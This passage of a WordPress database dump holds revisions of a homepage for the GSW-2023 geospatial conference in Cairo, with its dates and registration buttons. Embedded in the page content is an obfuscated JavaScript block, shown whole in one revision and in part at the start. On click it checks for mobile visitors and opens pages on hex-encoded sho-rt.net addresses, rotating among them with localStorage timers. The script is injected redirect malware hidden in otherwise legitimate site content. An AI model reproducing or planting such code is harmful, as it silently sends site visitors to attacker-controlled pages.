_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:04:18','2022-11-09 19:04:18','',3066,'https://gsw2023.com/?p=3198',0,'revision','',0),
(3199,1,'2022-11-09 19:05:37','2022-11-09 19:05:37','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020722052{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 50px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:05:37','2022-11-09 19:05:37','',3066,'https://gsw2023.com/?p=3199',0,'revision','',0),
(3200,1,'2022-11-09 19:06:31','2022-11-09 19:06:31','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" 